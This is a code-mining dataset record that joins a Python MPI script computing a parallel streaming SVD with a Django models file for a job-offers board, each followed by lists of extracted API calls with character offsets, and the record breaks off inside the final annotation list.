((1811, 1928), 'sklearn.model_selection.cross_validate', 'cross_validate', (['main_pipe', 'X_train', 'y_train'], {'return_train_score': '(True)', 'scoring': "['accuracy', 'precision', 'recall']"}), "(main_pipe, X_train, y_train, return_train_score=True,\n scoring=['accuracy', 'precision', 'recall'])\n", (1825, 1928), False, 'from sklearn.model_selection import train_test_split, cross_validate\n')] |
import numpy as np
np.random.seed(10)
import matplotlib.pyplot as plt
from mpi4py import MPI
# For shared memory deployment: `export OPENBLAS_NUM_THREADS=1`
# Method of snapshots
def generate_right_vectors(A):
'''
A - Snapshot matrix - shape: NxS
returns V - truncated right singular vectors
'''
new_mat = np.matmul(np.transpose(A),A)
w, v = np.linalg.eig(new_mat)
svals = np.sqrt(np.abs(w))
rval = np.argmax(svals<0.0001) # eps0
return v[:,:rval], np.sqrt(np.abs(w[:rval])) # Covariance eigenvectors, singular values
# Randomized SVD to accelerate
def low_rank_svd(A,K):
M = A.shape[0]
N = A.shape[1]
omega = np.random.normal(size=(N,2*K))
omega_pm = np.matmul(A,np.transpose(A))
Y = np.matmul(omega_pm,np.matmul(A,omega))
Qred, Rred = np.linalg.qr(Y)
B = np.matmul(np.transpose(Qred),A)
ustar, snew, _ = np.linalg.svd(B)
unew = np.matmul(Qred,ustar)
unew = unew[:,:K]
snew = snew[:K]
return unew, snew
# Check orthogonality
def check_ortho(modes,num_modes):
for m1 in range(num_modes):
for m2 in range(num_modes):
if m1 == m2:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,1.0):
print('Orthogonality check failed')
break
else:
s_ = np.sum(modes[:,m1]*modes[:,m2])
if not np.isclose(s_,0.0):
print('Orthogonality check failed')
break
print('Orthogonality check passed successfully')
class online_svd_calculator(object):
"""
docstring for online_svd_calculator:
K : Number of modes to truncate
ff : Forget factor
"""
def __init__(self, K, ff, low_rank=False):
super(online_svd_calculator, self).__init__()
self.K = K
self.ff = ff
# Initialize MPI
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
self.nprocs = self.comm.Get_size()
self.iteration = 0
self.low_rank = low_rank
# Initialize
def initialize(self, A):
self.ulocal, self.svalue = self.parallel_svd(A)
def parallel_qr(self,A):
# Perform the local QR
q, r = np.linalg.qr(A)
rlocal_shape_0 = r.shape[0]
rlocal_shape_1 = r.shape[1]
# Gather data at rank 0:
r_global = self.comm.gather(r,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = r_global[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,r_global[i+1]),axis=0)
r_global = temp
qglobal, rfinal = np.linalg.qr(r_global)
qglobal = -qglobal # Trick for consistency
rfinal = -rfinal
# For this rank
qlocal = np.matmul(q,qglobal[:rlocal_shape_0])
# send to other ranks
for rank in range(1,self.nprocs):
self.comm.send(qglobal[rank*rlocal_shape_0:(rank+1)*rlocal_shape_0], dest=rank, tag=rank+10)
# Step b of Levy-Lindenbaum - small operation
if self.low_rank:
# Low rank SVD
unew, snew = low_rank_svd(rfinal,self.K)
else:
unew, snew, _ = np.linalg.svd(rfinal)
else:
# Receive qglobal slices from other ranks
qglobal = self.comm.recv(source=0, tag=self.rank+10)
# For this rank
qlocal = np.matmul(q,qglobal)
# To receive new singular vectors
unew = None
snew = None
unew = self.comm.bcast(unew,root=0)
snew = self.comm.bcast(snew,root=0)
return qlocal, unew, snew
def parallel_svd(self,A):
vlocal, slocal = generate_right_vectors(A)
# Find Wr
wlocal = np.matmul(vlocal,np.diag(slocal).T)
# Gather data at rank 0:
wglobal = self.comm.gather(wlocal,root=0)
# perform SVD at rank 0:
if self.rank == 0:
temp = wglobal[0]
for i in range(self.nprocs-1):
temp = np.concatenate((temp,wglobal[i+1]),axis=-1)
wglobal = temp
if self.low_rank:
x, s = low_rank_svd(wglobal,self.K)
else:
x, s, y = np.linalg.svd(wglobal)
else:
x = None
s = None
x = self.comm.bcast(x,root=0)
s = self.comm.bcast(s,root=0)
# # Find truncation threshold
# s_ratio = np.cumsum(s)/np.sum(s)
# rval = np.argmax(1.0-s_ratio<0.0001) # eps1
# perform APMOS at each local rank
phi_local = []
for mode in range(self.K):
phi_temp = 1.0/s[mode]*np.matmul(A,x[:,mode:mode+1])
phi_local.append(phi_temp)
temp = phi_local[0]
for i in range(self.K-1):
temp = np.concatenate((temp,phi_local[i+1]),axis=-1)
return temp, s[:self.K] #
def incorporate_data(self,A):
self.iteration+=1
ll = self.ff*np.matmul(self.ulocal,np.diag(self.svalue))
ll = np.concatenate((ll,A),axis=-1)
qlocal, utemp, self.svalue = self.parallel_qr(ll)
self.ulocal = np.matmul(qlocal,utemp)
def gather_modes(self):
# Gather modes at rank 0
# This is automatically in order
phi_global = self.comm.gather(self.ulocal,root=0)
if self.rank == 0:
phi = phi_global[0]
for i in range(self.nprocs-1):
phi = np.concatenate((phi,phi_global[i+1]),axis=0)
np.save('Online_Parallel_POD.npy',phi)
np.save('Online_Parallel_SingularValues.npy',self.svalue)
# Validate
serial = np.load('Serial_Modes_MOS.npy')
parallel_online = np.load('Online_Parallel_POD.npy')
serial_online = np.load('Online_Serial_POD.npy')
plt.figure()
plt.plot(serial[:,0],label='serial one-shot')
plt.plot(parallel_online[:,0],label='parallel_online')
plt.plot(serial_online[:,0],label='serial_online')
plt.title('U comparison - column 0')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
plt.figure()
plt.plot(serial[:,2],label='serial one-shot')
plt.plot(parallel_online[:,2],label='parallel_online')
plt.plot(serial_online[:,2],label='serial_online')
plt.title('U comparison - column 2')
plt.xlabel('Domain')
plt.ylabel('U magnitude')
plt.legend()
serial_svs = np.load('Serial_SingularValues.npy')
serial_online_svs = np.load('Online_Serial_SingularValues.npy')
parallel_online_svs = np.load('Online_Parallel_SingularValues.npy')
plt.figure()
plt.plot(serial_svs[:self.K],label='serial one-shot')
plt.plot(parallel_online_svs[:self.K],label='parallel_online')
plt.plot(serial_online_svs[:self.K],label='serial_online')
plt.title('Singular values')
plt.xlabel('Index')
plt.ylabel('Magnitude')
plt.legend()
plt.show()
# Check orthogonality - should all be successful
check_ortho(serial,self.K)
check_ortho(serial_online,self.K)
check_ortho(parallel_online,self.K)
if __name__ == '__main__':
from time import time
# Initialize timer
start_time = time()
test_class = online_svd_calculator(10,1.0,low_rank=True)
iteration = 0
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.initialize(data)
for iteration in range(1,4):
data = np.load('points_rank_'+str(test_class.rank)+'_batch_'+str(iteration)+'.npy')
test_class.incorporate_data(data)
end_time = time()
print('Time required for parallel streaming SVD (each rank):', end_time-start_time)
test_class.gather_modes() | [
"matplotlib.pyplot.ylabel",
"numpy.save",
"numpy.linalg.qr",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.matmul",
"numpy.random.seed",
"numpy.concatenate",
"numpy.random.normal",
"numpy.abs",
"numpy.linalg.eig",
"numpy.argmax",
"numpy.linalg.svd",
"matplotlib.pyplot.title"... | [((19, 37), 'numpy.random.seed', 'np.random.seed', (['(10)'], {}), '(10)\n', (33, 37), True, 'import numpy as np\n'), ((368, 390), 'numpy.linalg.eig', 'np.linalg.eig', (['new_mat'], {}), '(new_mat)\n', (381, 390), True, 'import numpy as np\n'), ((434, 459), 'numpy.argmax', 'np.argmax', (['(svals < 0.0001)'], {}), '(svals < 0.0001)\n', (443, 459), True, 'import numpy as np\n'), ((664, 697), 'numpy.random.normal', 'np.random.normal', ([], {'size': '(N, 2 * K)'}), '(size=(N, 2 * K))\n', (680, 697), True, 'import numpy as np\n'), ((805, 820), 'numpy.linalg.qr', 'np.linalg.qr', (['Y'], {}), '(Y)\n', (817, 820), True, 'import numpy as np\n'), ((883, 899), 'numpy.linalg.svd', 'np.linalg.svd', (['B'], {}), '(B)\n', (896, 899), True, 'import numpy as np\n'), ((916, 938), 'numpy.matmul', 'np.matmul', (['Qred', 'ustar'], {}), '(Qred, ustar)\n', (925, 938), True, 'import numpy as np\n'), ((7592, 7598), 'time.time', 'time', ([], {}), '()\n', (7596, 7598), False, 'from time import time\n'), ((7984, 7990), 'time.time', 'time', ([], {}), '()\n', (7988, 7990), False, 'from time import time\n'), ((338, 353), 'numpy.transpose', 'np.transpose', (['A'], {}), '(A)\n', (350, 353), True, 'import numpy as np\n'), ((412, 421), 'numpy.abs', 'np.abs', (['w'], {}), '(w)\n', (418, 421), True, 'import numpy as np\n'), ((723, 738), 'numpy.transpose', 'np.transpose', (['A'], {}), '(A)\n', (735, 738), True, 'import numpy as np\n'), ((767, 786), 'numpy.matmul', 'np.matmul', (['A', 'omega'], {}), '(A, omega)\n', (776, 786), True, 'import numpy as np\n'), ((840, 858), 'numpy.transpose', 'np.transpose', (['Qred'], {}), '(Qred)\n', (852, 858), True, 'import numpy as np\n'), ((2280, 2295), 'numpy.linalg.qr', 'np.linalg.qr', (['A'], {}), '(A)\n', (2292, 2295), True, 'import numpy as np\n'), ((5170, 5202), 'numpy.concatenate', 'np.concatenate', (['(ll, A)'], {'axis': '(-1)'}), '((ll, A), axis=-1)\n', (5184, 5202), True, 'import numpy as np\n'), ((5283, 5307), 'numpy.matmul', 'np.matmul', (['qlocal', 'utemp'], {}), '(qlocal, utemp)\n', (5292, 5307), True, 'import numpy as np\n'), ((497, 513), 'numpy.abs', 'np.abs', (['w[:rval]'], {}), '(w[:rval])\n', (503, 513), True, 'import numpy as np\n'), ((2709, 2731), 'numpy.linalg.qr', 'np.linalg.qr', (['r_global'], {}), '(r_global)\n', (2721, 2731), True, 'import numpy as np\n'), ((2866, 2904), 'numpy.matmul', 'np.matmul', (['q', 'qglobal[:rlocal_shape_0]'], {}), '(q, qglobal[:rlocal_shape_0])\n', (2875, 2904), True, 'import numpy as np\n'), ((3527, 3548), 'numpy.matmul', 'np.matmul', (['q', 'qglobal'], {}), '(q, qglobal)\n', (3536, 3548), True, 'import numpy as np\n'), ((4949, 4998), 'numpy.concatenate', 'np.concatenate', (['(temp, phi_local[i + 1])'], {'axis': '(-1)'}), '((temp, phi_local[i + 1]), axis=-1)\n', (4963, 4998), True, 'import numpy as np\n'), ((5651, 5690), 'numpy.save', 'np.save', (['"""Online_Parallel_POD.npy"""', 'phi'], {}), "('Online_Parallel_POD.npy', phi)\n", (5658, 5690), True, 'import numpy as np\n'), ((5702, 5760), 'numpy.save', 'np.save', (['"""Online_Parallel_SingularValues.npy"""', 'self.svalue'], {}), "('Online_Parallel_SingularValues.npy', self.svalue)\n", (5709, 5760), True, 'import numpy as np\n'), ((5805, 5836), 'numpy.load', 'np.load', (['"""Serial_Modes_MOS.npy"""'], {}), "('Serial_Modes_MOS.npy')\n", (5812, 5836), True, 'import numpy as np\n'), ((5867, 5901), 'numpy.load', 'np.load', (['"""Online_Parallel_POD.npy"""'], {}), "('Online_Parallel_POD.npy')\n", (5874, 5901), True, 'import numpy as np\n'), ((5930, 5962), 'numpy.load', 'np.load', (['"""Online_Serial_POD.npy"""'], {}), "('Online_Serial_POD.npy')\n", (5937, 5962), True, 'import numpy as np\n'), ((5976, 5988), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5986, 5988), True, 'import matplotlib.pyplot as plt\n'), ((6001, 6048), 'matplotlib.pyplot.plot', 'plt.plot', (['serial[:, 0]'], {'label': '"""serial one-shot"""'}), "(serial[:, 0], label='serial one-shot')\n", (6009, 6048), True, 'import matplotlib.pyplot as plt\n'), ((6059, 6115), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online[:, 0]'], {'label': '"""parallel_online"""'}), "(parallel_online[:, 0], label='parallel_online')\n", (6067, 6115), True, 'import matplotlib.pyplot as plt\n'), ((6126, 6178), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online[:, 0]'], {'label': '"""serial_online"""'}), "(serial_online[:, 0], label='serial_online')\n", (6134, 6178), True, 'import matplotlib.pyplot as plt\n'), ((6189, 6225), 'matplotlib.pyplot.title', 'plt.title', (['"""U comparison - column 0"""'], {}), "('U comparison - column 0')\n", (6198, 6225), True, 'import matplotlib.pyplot as plt\n'), ((6238, 6258), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Domain"""'], {}), "('Domain')\n", (6248, 6258), True, 'import matplotlib.pyplot as plt\n'), ((6271, 6296), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""U magnitude"""'], {}), "('U magnitude')\n", (6281, 6296), True, 'import matplotlib.pyplot as plt\n'), ((6309, 6321), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6319, 6321), True, 'import matplotlib.pyplot as plt\n'), ((6335, 6347), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6345, 6347), True, 'import matplotlib.pyplot as plt\n'), ((6360, 6407), 'matplotlib.pyplot.plot', 'plt.plot', (['serial[:, 2]'], {'label': '"""serial one-shot"""'}), "(serial[:, 2], label='serial one-shot')\n", (6368, 6407), True, 'import matplotlib.pyplot as plt\n'), ((6418, 6474), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online[:, 2]'], {'label': '"""parallel_online"""'}), "(parallel_online[:, 2], label='parallel_online')\n", (6426, 6474), True, 'import matplotlib.pyplot as plt\n'), ((6485, 6537), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online[:, 2]'], {'label': '"""serial_online"""'}), "(serial_online[:, 2], label='serial_online')\n", (6493, 6537), True, 'import matplotlib.pyplot as plt\n'), ((6548, 6584), 'matplotlib.pyplot.title', 'plt.title', (['"""U comparison - column 2"""'], {}), "('U comparison - column 2')\n", (6557, 6584), True, 'import matplotlib.pyplot as plt\n'), ((6597, 6617), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Domain"""'], {}), "('Domain')\n", (6607, 6617), True, 'import matplotlib.pyplot as plt\n'), ((6630, 6655), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""U magnitude"""'], {}), "('U magnitude')\n", (6640, 6655), True, 'import matplotlib.pyplot as plt\n'), ((6668, 6680), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6678, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6707, 6743), 'numpy.load', 'np.load', (['"""Serial_SingularValues.npy"""'], {}), "('Serial_SingularValues.npy')\n", (6714, 6743), True, 'import numpy as np\n'), ((6776, 6819), 'numpy.load', 'np.load', (['"""Online_Serial_SingularValues.npy"""'], {}), "('Online_Serial_SingularValues.npy')\n", (6783, 6819), True, 'import numpy as np\n'), ((6854, 6899), 'numpy.load', 'np.load', (['"""Online_Parallel_SingularValues.npy"""'], {}), "('Online_Parallel_SingularValues.npy')\n", (6861, 6899), True, 'import numpy as np\n'), ((6913, 6925), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6923, 6925), True, 'import matplotlib.pyplot as plt\n'), ((6938, 6992), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_svs[:self.K]'], {'label': '"""serial one-shot"""'}), "(serial_svs[:self.K], label='serial one-shot')\n", (6946, 6992), True, 'import matplotlib.pyplot as plt\n'), ((7004, 7067), 'matplotlib.pyplot.plot', 'plt.plot', (['parallel_online_svs[:self.K]'], {'label': '"""parallel_online"""'}), "(parallel_online_svs[:self.K], label='parallel_online')\n", (7012, 7067), True, 'import matplotlib.pyplot as plt\n'), ((7079, 7138), 'matplotlib.pyplot.plot', 'plt.plot', (['serial_online_svs[:self.K]'], {'label': '"""serial_online"""'}), "(serial_online_svs[:self.K], label='serial_online')\n", (7087, 7138), True, 'import matplotlib.pyplot as plt\n'), ((7150, 7178), 'matplotlib.pyplot.title', 'plt.title', (['"""Singular values"""'], {}), "('Singular values')\n", (7159, 7178), True, 'import matplotlib.pyplot as plt\n'), ((7191, 7210), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Index"""'], {}), "('Index')\n", (7201, 7210), True, 'import matplotlib.pyplot as plt\n'), ((7223, 7246), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Magnitude"""'], {}), "('Magnitude')\n", (7233, 7246), True, 'import matplotlib.pyplot as plt\n'), ((7259, 7271), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (7269, 7271), True, 'import matplotlib.pyplot as plt\n'), ((7284, 7294), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7292, 7294), True, 'import matplotlib.pyplot as plt\n'), ((1175, 1210), 'numpy.sum', 'np.sum', (['(modes[:, m1] * modes[:, m2])'], {}), '(modes[:, m1] * modes[:, m2])\n', (1181, 1210), True, 'import numpy as np\n'), ((1372, 1407), 'numpy.sum', 'np.sum', (['(modes[:, m1] * modes[:, m2])'], {}), '(modes[:, m1] * modes[:, m2])\n', (1378, 1407), True, 'import numpy as np\n'), ((2606, 2653), 'numpy.concatenate', 'np.concatenate', (['(temp, r_global[i + 1])'], {'axis': '(0)'}), '((temp, r_global[i + 1]), axis=0)\n', (2620, 2653), True, 'import numpy as np\n'), ((3321, 3342), 'numpy.linalg.svd', 'np.linalg.svd', (['rfinal'], {}), '(rfinal)\n', (3334, 3342), True, 'import numpy as np\n'), ((3903, 3918), 'numpy.diag', 'np.diag', (['slocal'], {}), '(slocal)\n', (3910, 3918), True, 'import numpy as np\n'), ((4163, 4210), 'numpy.concatenate', 'np.concatenate', (['(temp, wglobal[i + 1])'], {'axis': '(-1)'}), '((temp, wglobal[i + 1]), axis=-1)\n', (4177, 4210), True, 'import numpy as np\n'), ((4361, 4383), 'numpy.linalg.svd', 'np.linalg.svd', (['wglobal'], {}), '(wglobal)\n', (4374, 4383), True, 'import numpy as np\n'), ((4798, 4831), 'numpy.matmul', 'np.matmul', (['A', 'x[:, mode:mode + 1]'], {}), '(A, x[:, mode:mode + 1])\n', (4807, 4831), True, 'import numpy as np\n'), ((5135, 5155), 'numpy.diag', 'np.diag', (['self.svalue'], {}), '(self.svalue)\n', (5142, 5155), True, 'import numpy as np\n'), ((5593, 5641), 'numpy.concatenate', 'np.concatenate', (['(phi, phi_global[i + 1])'], {'axis': '(0)'}), '((phi, phi_global[i + 1]), axis=0)\n', (5607, 5641), True, 'import numpy as np\n'), ((1231, 1250), 'numpy.isclose', 'np.isclose', (['s_', '(1.0)'], {}), '(s_, 1.0)\n', (1241, 1250), True, 'import numpy as np\n'), ((1428, 1447), 'numpy.isclose', 'np.isclose', (['s_', '(0.0)'], {}), '(s_, 0.0)\n', (1438, 1447), True, 'import numpy as np\n')] |
import html
import json
import re
from datetime import date
from autoslug import AutoSlugField
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.core.validators import MinLengthValidator
from django.db.models.aggregates import Count
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from django.utils.timezone import now
from django.utils.translation import gettext as _
from easyaudit.models import CRUDEvent
from taggit_autosuggest.managers import TaggableManager
from pycompanies.models import UserCompanyProfile
from .constants import STATE_LABEL_CLASSES
class EventType(models.IntegerChoices):
"""
Types of event visualization
"""
LISTING_VIEW = (0, _('Visualización en Listado'))
DETAIL_VIEW = (1, _('Visualización de la oferta completa'))
CONTACT_INFO_VIEW = (2, _('Apertura de la información de contacto'))
class Experience(models.TextChoices):
"""
Choices for JobOffer Experience.
"""
ZERO = '0', _('0')
ONE_PLUS = '1+', _('1+')
TWO_PLUS = '2+', _('2+')
THREE_PLUS = '3+', _('3+')
FIVE_PLUS = '5+', _('5+')
TEN_PLUS = '10+', _('10+')
class Remoteness(models.TextChoices):
"""
Choices for Remoteness.
"""
REMOTE = 'REMOTE', _('Remoto')
OFFICE = 'IN_OFFICE', _('Presencial')
HYBRID = 'MIXED', _('Mixto')
class HiringType(models.TextChoices):
"""
Choices for HiringType.
"""
EMPLOYEE = 'EMPLOYEE', _('Relación de dependencia')
MONOTRIBUTISTA = 'MONOTRIBUTO', _('Monotributista')
CONTRACTOR_SHORT = 'CONTRACTOR_SHORT', _('Contractor short term')
CONTRACTOR_LONG = 'CONTRACTOR_LONG', _('Contractor long term')
COOPERATIVE = 'COOPERATIVE', _('Cooperativa de trabajo')
GOVERNMENT = 'GOVERNMENT', _('Estado')
OTHER = 'OTHER', _('Otra')
class OfferState(models.TextChoices):
"""
Choices for JobOfferStates.
"""
NEW = 'NEW', _('Nuevo') # Used only for actions
DEACTIVATED = 'DEACTIVATED', _('Desactivada')
MODERATION = 'MODERATION', _('En moderación')
ACTIVE = 'ACTIVE', _('Activa')
REJECTED = 'REJECTED', _('Rechazada')
EXPIRED = 'EXPIRED', _('Caducada')
class JobOffer(models.Model):
"""A PyAr Job Offer."""
title = models.CharField(
max_length=255, verbose_name=_('Título'), validators=[MinLengthValidator(20)], unique=True
)
company = models.ForeignKey(
'pycompanies.Company',
verbose_name=_('Empresa'),
on_delete=models.CASCADE,
)
location = models.CharField(max_length=100, blank=True, null=True, verbose_name=_('Lugar'))
contact_mail = models.EmailField(
max_length=255, blank=True, null=True, verbose_name=_('E-mail')
)
contact_phone = models.CharField(
max_length=255, null=True, blank=True, verbose_name=_('Teléfono')
)
contact_url = models.CharField(
max_length=255, null=True, blank=True, verbose_name=_('URL Contacto')
)
experience = models.CharField(
max_length=3, choices=Experience.choices, verbose_name=_('Experiencia')
)
remoteness = models.CharField(
max_length=32, choices=Remoteness.choices, verbose_name=_('Modalidad de trabajo')
)
tags = TaggableManager(verbose_name=_('Etiquetas'), blank=True)
hiring_type = models.CharField(
max_length=32, choices=HiringType.choices, verbose_name=_('Tipo de contratación')
)
salary = models.CharField(
max_length=255, null=True, verbose_name=_('Rango salarial')
)
description = models.TextField(verbose_name=_('Descripción'))
short_description = models.TextField(
max_length=512,
verbose_name=_('Descripción corta')
)
created_at = models.DateTimeField(
auto_now_add=True, verbose_name=_('Hora de creación')
)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_('Creado por'),
related_name='created_offers',
)
modified_at = models.DateTimeField(auto_now=True, verbose_name=_('Hora de Modificación'))
modified_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_('Modificado por'),
related_name='modified_offers',
)
state = models.CharField(
max_length=32, choices=OfferState.choices, default=OfferState.DEACTIVATED,
verbose_name=_('Estado de la oferta')
)
slug = AutoSlugField(populate_from='title', unique=True)
def get_absolute_url(self):
url = reverse('joboffers:view', kwargs={'slug': self.slug})
absolute_url = "".join((settings.BASE_URL, url))
return absolute_url
def __str__(self):
return self.title
@property
def last_comment(self):
"""
Return the last rejection JobOfferComment
"""
return self.joboffercomment_set.last()
@classmethod
def get_short_description(cls, description):
"""
Deduce the short_description from a given html description string
"""
description_stripped_tags = re.sub(r'<[^>]*>', ' ', description)
description_without_spaces = re.sub(r'\s+', ' ', description_stripped_tags).strip()
description_unescaped = html.unescape(description_without_spaces)
return description_unescaped[:512]
def track_visualization(self, session, event_type: EventType):
"""
Either get or create the matching JobOfferAccessLog instance for the joboffer.
"""
today = date.today()
month_year = today.year * 100 + today.month
if session.session_key is None:
session.save()
return JobOfferAccessLog.objects.get_or_create(
month_and_year=month_year,
event_type=event_type,
session=session.session_key,
joboffer=self
)
def get_publisher_mail_addresses(self):
"""
Return a list of the email addresses of the publishers of this offer.
It filters users with empty mail field
"""
profiles = UserCompanyProfile.objects.filter(company=self.company)
addresses = set()
for profile in profiles:
if profile.user.email:
addresses.add(profile.user.email)
return addresses
def get_visualizations_count(self):
"""
Get a dict with visualizations count for every kind of event
"""
items = JobOfferAccessLog.objects \
.filter(joboffer=self) \
.values_list('event_type') \
.annotate(total=Count('event_type')) \
.order_by()
return dict(items)
def save(self, *args, **kwargs):
self.slug = slugify(self.title)
if not self.short_description:
self.short_description = self.get_short_description(self.description)
super().save(*args, **kwargs)
@classmethod
def get_options(cls):
"""
Public _meta API accesor https://docs.djangoproject.com/en/4.0/ref/models/meta/
"""
return cls._meta
class Meta:
constraints = [
models.CheckConstraint(
name='%(app_label)s_%(class)s_not_all_contact_info_null',
check=(
models.Q(
contact_mail__isnull=False,
)
| models.Q(
contact_phone__isnull=False,
)
| models.Q(
contact_url__isnull=False,
)
),
),
models.CheckConstraint(
name='%(app_label)s_%(class)s_location_not_null_when_not_remote',
check=(
(
models.Q(remoteness__in=(Remoteness.HYBRID, Remoteness.OFFICE))
& models.Q(location__isnull=False)
)
| models.Q(remoteness=Remoteness.REMOTE)
),
),
]
class CommentType(models.TextChoices):
"""
Choices for Types of JobOfferComments.
"""
MODERATION = 'MODERATION', _('Moderación')
EDITION = 'EDITION', _('Edición')
SPAM = 'SPAM', _('Spam')
INSUFICIENT = 'INSUFICIENT', _('Información insuficiente')
NOT_RELATED = 'NOT_PYTHON', _('Oferta no relacionada con Python')
class JobOfferComment(models.Model):
"""
A comment on a JobOffer.
"""
text = models.TextField(verbose_name=_('Texto'))
comment_type = models.CharField(
max_length=32, choices=CommentType.choices, verbose_name=_('Tipo'))
created_at = models.DateTimeField(
auto_now_add=True, verbose_name=_('Rango salarial')
)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
verbose_name=_('Creado por'),
related_name='created_joboffer_comments',
)
joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
@classmethod
def get_options(cls):
"""
Public _meta API accesor https://docs.djangoproject.com/en/4.0/ref/models/meta/
"""
return cls._meta
def __str__(self):
return f"{self.joboffer.title}: {self.get_comment_type_display()}"
class JobOfferHistoryManager(models.Manager):
def for_offer(self, joboffer):
"""
Get all the history objects for a given joboffer. It can be JobOffer and JobOfferComment
"""
qs = super().get_queryset()
offer_ctype = ContentType.objects.get(app_label='joboffers', model='joboffer')
offer_comment_ctype = ContentType.objects.get(
app_label='joboffers', model='joboffercomment'
)
offer_q = models.Q(event_type__lt=4, object_id=joboffer.id, content_type=offer_ctype)
offer_comment_ids = [
offer_comment.id for offer_comment in joboffer.joboffercomment_set.all()
]
offer_comment_q = models.Q(
object_id__in=offer_comment_ids, content_type=offer_comment_ctype
)
qs = qs.filter(offer_q | offer_comment_q)
return qs
class JobOfferHistory(CRUDEvent):
"""
This is a proxy model used to simplify the code take away all the logic from the controller
"""
objects = JobOfferHistoryManager()
@property
def fields(self):
"""
Return the representation of the joboffer after this particular change is applied.
It returns a python dict that can contain different fields that the current model.
"""
obj_repr = json.loads(self.object_json_repr)
fields = obj_repr[0]['fields']
return fields
@property
def joboffer_comment(self):
"""
Return the JobOfferComment instance for the matching JobOfferHistory
"""
if self.content_type.model != 'joboffercomment':
raise ValueError("Unexpected model. Expected a JobOfferComment instance.")
return JobOfferComment.objects.get(id=self.object_id)
@property
def changes(self):
"""
Get a dict with the changes made to the object.
"""
if self.changed_fields:
return json.loads(self.changed_fields)
else:
return None
@property
def state_label(self):
"""
Get the state of the joboffer at the time of the change
"""
if self.content_type.model != 'joboffer':
raise ValueError("Unexpected model. Expected a JobOffer instance.")
fields = self.fields
joboffer = JobOffer(state=fields['state'])
return joboffer.get_state_display()
@property
def state_label_class(self):
"""
Get the bootstrap label class for the matching joboffer state. Returns a default if the
'state' field is not present. Maybe because a name update in the model.
"""
if self.content_type.model != 'joboffer':
raise ValueError("Unexpected model. Expected a JobOffer instance.")
state = self.fields['state']
return STATE_LABEL_CLASSES[state]
class Meta:
proxy = True
class JobOfferAccessLog(models.Model):
"""
Model to track visualization of joboffers
"""
created_at = models.DateTimeField(default=now)
month_and_year = models.PositiveIntegerField()
event_type = models.PositiveSmallIntegerField(
choices=EventType.choices, verbose_name=_('Tipo de Evento')
)
session = models.CharField(max_length=40, verbose_name=_('Identificador de Sesión'))
joboffer = models.ForeignKey(JobOffer, on_delete=models.CASCADE)
class Meta:
ordering = ['created_at']
| [
"django.utils.text.slugify",
"json.loads",
"pycompanies.models.UserCompanyProfile.objects.filter",
"django.utils.translation.gettext",
"django.contrib.contenttypes.models.ContentType.objects.get",
"django.db.models.ForeignKey",
"autoslug.AutoSlugField",
"html.unescape",
"django.db.models.Q",
"djan... | [((4512, 4561), 'autoslug.AutoSlugField', 'AutoSlugField', ([], {'populate_from': '"""title"""', 'unique': '(True)'}), "(populate_from='title', unique=True)\n", (4525, 4561), False, 'from autoslug import AutoSlugField\n'), ((9125, 9178), 'django.db.models.ForeignKey', 'models.ForeignKey', (['JobOffer'], {'on_delete': 'models.CASCADE'}), '(JobOffer, on_delete=models.CASCADE)\n', (9142, 9178), False, 'from django.db import models\n'), ((12468, 12501), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'now'}), '(default=now)\n', (12488, 12501), False, 'from django.db import models\n'), ((12523, 12552), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', ([], {}), '()\n', (12550, 12552), False, 'from django.db import models\n'), ((12782, 12835), 'django.db.models.ForeignKey', 'models.ForeignKey', (['JobOffer'], {'on_delete': 'models.CASCADE'}), '(JobOffer, on_delete=models.CASCADE)\n', (12799, 12835), False, 'from django.db import models\n'), ((780, 809), 'django.utils.translation.gettext', '_', (['"""Visualización en Listado"""'], {}), "('Visualización en Listado')\n", (781, 809), True, 'from django.utils.translation import gettext as _\n'), ((833, 873), 'django.utils.translation.gettext', '_', (['"""Visualización de la oferta completa"""'], {}), "('Visualización de la oferta completa')\n", (834, 873), True, 'from django.utils.translation import gettext as _\n'), ((903, 946), 'django.utils.translation.gettext', '_', (['"""Apertura de la información de contacto"""'], {}), "('Apertura de la información de contacto')\n", (904, 946), True, 'from django.utils.translation import gettext as _\n'), ((1057, 1063), 'django.utils.translation.gettext', '_', (['"""0"""'], {}), "('0')\n", (1058, 1063), True, 'from django.utils.translation import gettext as _\n'), ((1085, 1092), 'django.utils.translation.gettext', '_', (['"""1+"""'], {}), "('1+')\n", (1086, 1092), True, 'from django.utils.translation import gettext as _\n'), ((1114, 1121), 'django.utils.translation.gettext', '_', 